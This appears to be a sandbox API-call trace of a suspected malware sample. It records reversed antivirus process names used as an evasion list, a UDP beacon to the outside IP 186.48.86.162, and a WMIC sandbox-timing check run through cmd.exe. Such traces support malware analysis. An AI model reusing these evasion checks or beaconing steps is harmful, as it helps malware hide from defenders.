[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iuredipsrowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iuredipsrowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nom_popsrowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.nom_popsrowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="bewrdom_popsrowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="bewrdom_popsrowten") returned 5
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eruces-fpopsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="eruces-fpopsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="hkciuq-fpopsrowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="hkciuq-fpopsrowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sloot cppopsrowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="sloot cppopsrowten") returned 8
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartstcprowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartstcprowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erpivartstcprowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="erpivartstcprowten") returned 5
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namronrtstcprowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="namronrtstcprowten") returned 6
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.adnaztcprowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.adnaztcprowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="suriv-itna acowten", cbMultiByte=13, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="suriv-itna acowten") returned 13
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.vsbewhsacowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.vsbewhsacowten") returned 12
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartsrsacowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartsrsacowten") returned 10
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draug2aacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.draug2aacowten") returned 11
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="secessmug2aacowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="secessmug2aacowten") returned 7
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="draugllub2aacowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="draugllub2aacowten") returned 9
[0572.238] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tneganlkb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tneganlkb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vakbanlkb2aacowten", cbMultiByte=4, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vakbanlkb2aacowten") returned 4
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tshcvsccb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tshcvsccb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="odomocccb2aacowten", cbMultiByte=6, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="odomocccb2aacowten") returned 6
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegadmcb2aacowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegadmcb2aacowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yart063acowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yart063acowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tngaesiu063acowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tngaesiu063acowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="malcesiu063acowten", cbMultiByte=4, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="malcesiu063acowten") returned 4
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegaredipsacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegaredipsacowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="ecivresmabmacowten", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="ecivresmabmacowten") returned 11
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvspavancowten", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvspavancowten") returned 12
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.mocvavancowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.mocvavancowten") returned 9
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartazancowten", cbMultiByte=10, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.yartazancowten") returned 10
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tenummitazancowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tenummitazancowten") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugvazancowten", cbMultiByte=9, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.iugvazancowten") returned 9
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartmabmazancowten", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yartmabmazancowten") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsmbmtmazancowten", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vrsmbmtmazancowten") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tirivmtmazancowten", cbMultiByte=5, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tirivmtmazancowten") returned 5
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.esnefedevitcahq", cbMultiByte=19, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.esnefedevitcahq") returned 19
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsdpudsvitcahq", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsdpudsvitcahq") returned 12
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegacmdpudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnegacmdpudsvitcahq") returned 7
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsdpuyapudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="vrsdpuyapudsvitcahq") returned 8
[0572.239] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnciucmapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tnciucmapudsvitcahq") returned 7
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartexkapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="yartexkapudsvitcahq") returned 7
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erocsexkpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="erocsexkpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsvaefmpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="cvsvaefmpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="nacstr7kpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="nacstr7kpudsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.gnepmsmsvitcahq", cbMultiByte=11, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.gnepmsmsvitcahq") returned 11
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tfosavalmsmsvitcahq", cbMultiByte=8, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="tfosavalmsmsvitcahq") returned 8
[0572.240] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.dleihscmvitcahq", cbMultiByte=12, lpWideCharStr=0x227dbe0, cchWideChar=2047 | out: lpWideCharStr="exe.dleihscmvitcahq") returned 12
[0572.240] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x227eb36 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0572.240] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078")) returned 0
[0572.240] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f1d8 | out: lpWSAData=0x227f1d8) returned 0
[0572.248] gethostname (in: name=0x227f0cc, namelen=256 | out: name="Q9iATrkPrH") returned 0
[0572.269] gethostbyname (name="Q9iATrkPrH") returned 0x1d06f60*(h_name="Q9iATrkPrH", h_aliases=0x1d06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1d06f88*=([0]="192.168.0.174"))
[0572.276] inet_ntoa (in=0xae00a8c0) returned="192.168.0.174"
[0572.276] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="192.168.0.174", cbMultiByte=13, lpWideCharStr=0x227e000, cchWideChar=2047 | out: lpWideCharStr="192.168.0.1749") returned 13
[0572.276] WSACleanup () returned 0
[0572.327] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x227f838 | out: lpWSAData=0x227f838) returned 0
[0572.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0572.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1e8c2b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0572.333] socket (af=2, type=2, protocol=17) returned 0x268
[0572.371] htons (hostshort=0xe061) returned 0x61e0
[0572.372] inet_addr (cp="186.48.86.162") returned 0xa25630ba
[0572.372] setsockopt (s=0x268, level=65535, optname=4102, optval="ÀÔ\x01", optlen=8) returned 0
[0572.372] sendto (s=0x268, buf=0x227ef5f*, len=96, flags=0, to=0x227ef4c*(sa_family=2, sin_port=0xe061, sin_addr="186.48.86.162"), tolen=16) returned 96
[0572.373] recvfrom (s=0x268, buf=0x227ee73, len=201, flags=0, from=0x227ef4c, fromlen=0x227ef48)
Thread:
id = 239
os_tid = 0x6bc
Thread:
id = 240
os_tid = 0x73c
Thread:
id = 265
os_tid = 0x558
Process:
id = "31"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x490f1000"
os_pid = "0x740"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "30"
os_parent_pid = "0x598"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4750
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4751
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4752
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4753
start_va = 0x1f0000
end_va = 0x2effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 4754
start_va = 0x4a050000
end_va = 0x4a0a8fff
monitored = 1
entry_point = 0x4a0590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 4755
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4756
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4757
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4758
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4759
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4760
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4761
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4762
start_va = 0x2f0000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 4763
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4764
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4765
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4766
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4767
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4768
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4769
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4770
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4771
start_va = 0x7fef72d0000
end_va = 0x7fef72d7fff
monitored = 0
entry_point = 0x7fef72d11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 4772
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4773
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4774
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4775
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4776
start_va = 0x520000
end_va = 0x69ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 4777
start_va = 0xc0000
end_va = 0x1bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4778
start_va = 0x1c0000
end_va = 0x1e8fff
monitored = 0
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4779
start_va = 0x6a0000
end_va = 0x827fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 4780
start_va = 0x1c0000
end_va = 0x1e8fff
monitored = 0
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4781
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4782
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4783
start_va = 0x830000
end_va = 0x9b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 4784
start_va = 0x9c0000
end_va = 0x1dbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009c0000"
filename = ""
Region:
id = 4785
start_va = 0x1c0000
end_va = 0x1dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 4786
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 4787
start_va = 0x2f0000
end_va = 0x2f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 4788
start_va = 0x420000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 4789
start_va = 0x1dc0000
end_va = 0x208efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 241
os_tid = 0x74c
[0561.676] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4012) returned 0x43b010
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x4010) returned 0x43f030
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x434780
[0561.677] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a07f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0561.677] GetProcessHeap () returned 0x420000
[0561.677] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434780 | out: hHeap=0x420000) returned 1
[0561.677] GetProcessHeap () returned 0x420000
[0561.678] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43f030 | out: hHeap=0x420000) returned 1
[0561.678] GetProcessHeap () returned 0x420000
[0561.679] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43b010 | out: hHeap=0x420000) returned 1
[0561.679] _wcsicmp (_String1="WMIC", _String2=")") returned 78
[0561.679] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17
[0561.679] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17
[0561.680] _wcsicmp (_String1="IF", _String2="WMIC") returned -14
[0561.680] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14
[0561.680] _wcsicmp (_String1="REM", _String2="WMIC") returned -5
[0561.680] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5
[0561.680] GetProcessHeap () returned 0x420000
[0561.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x439e80
[0561.680] GetProcessHeap () returned 0x420000
[0561.680] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x434780
[0561.682] GetProcessHeap () returned 0x420000
[0561.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x78) returned 0x439f40
[0561.682] GetProcessHeap () returned 0x420000
[0561.682] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x439fc0
[0561.683] _wcsicmp (_String1="FOR", _String2="more") returned -7
[0561.683] _wcsicmp (_String1="FOR/?", _String2="more") returned -7
[0561.683] _wcsicmp (_String1="IF", _String2="more") returned -4
[0561.683] _wcsicmp (_String1="IF/?", _String2="more") returned -4
[0561.683] _wcsicmp (_String1="REM", _String2="more") returned 5
[0561.683] _wcsicmp (_String1="REM/?", _String2="more") returned 5
[0561.683] GetProcessHeap () returned 0x420000
[0561.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb0) returned 0x43a080
[0561.683] GetProcessHeap () returned 0x420000
[0561.683] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x1a) returned 0x4347b0
[0561.684] GetProcessHeap () returned 0x420000
[0561.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x14) returned 0x438640
[0561.684] GetProcessHeap () returned 0x420000
[0561.684] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x38) returned 0x4367d0
[0561.690] GetProcessHeap () returned 0x420000
[0561.690] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x6a) returned 0x43a140
[0561.691] GetProcessHeap () returned 0x420000
[0561.691] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0x48) returned 0x43a1c0
[0561.691] _pipe (in: _PtHandles=0x43a1d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x43a1d0) returned 0
[0561.692] _dup (_FileHandle=1) returned 5
[0561.693] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0
[0561.694] _close (_FileHandle=4) returned 0
[0561.694] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0561.694] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0561.694] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0561.694] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0561.694] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0561.694] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0561.694] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0561.694] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0561.695] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0561.695] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0561.695] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0561.695] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0561.695] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0561.695] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0561.695] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0561.695] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0561.695] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0561.695] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0561.695] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0561.695] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0561.695] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0561.695] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
